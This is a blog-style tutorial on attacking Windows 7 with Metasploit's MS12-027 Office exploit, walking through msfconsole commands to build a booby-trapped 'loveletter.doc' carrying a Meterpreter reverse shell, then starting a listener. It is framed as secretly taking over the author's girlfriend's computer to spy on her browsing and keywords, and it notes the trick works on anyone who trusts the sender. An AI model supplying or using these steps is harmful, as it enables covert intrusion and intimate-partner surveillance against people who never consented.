top of page

Hacking Windows 7

Step 1: Compromise the System

Let's fire up BackTrack and Metsploit and figure out a way to compromise her system.

A couple of years back (April 2012), an exploit was found in the wild that you could create a buffer overflow (I'll be doing a tutorial to explain buffer overflows soon) in Windows 7 systems with Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.

In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed theMeterpreter so that I can "own" her system and check up on her.

Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.

When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend's computer, we can find it by typing at the msfconsole:

  • msf > search ms12_027

This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.

Step 2: Let's Get Some Background InfoIf I'm new to an exploit, I like to learn a little about what it does before I start. Let's type:msf > info

Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:

"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted..."

Notice that it also states "The DEP/ASLR bypass on Office 2010...". For those of you are unfamiliar, DEP is Data Execution Prevention and ASLR isAddress Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.

Step 3: Show Targets & Create Doc

Since we're pretty certain she uses Office 2007 and not Office 2010, let's set our target for 2007.

  • set target 0

Now, rather than use the generic msf.doc that comes with this exploit, let's give it a name that will entice her to open it. Let's call it loveletter.doc.

  • set FILENAME loveletter.doc

We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.

  • set PAYLOAD windows/meterpreter/reverse_tcp

  • set LHOST

With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory with a name we gave it, loveletter.doc.

Step 4: Multi Handler

Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.

  • use exploit/multi/handler

  • set PAYLOAD windows/meterpreter/reverse_tcp

  • set LHOST

  • exploit

Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend's computer. Let's email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!

  • Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and even better, set up Snort to look for keywords in her TCP stream going through our computer.

So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.

Recent Posts 
Serach By Tags
No tags yet.
bottom of page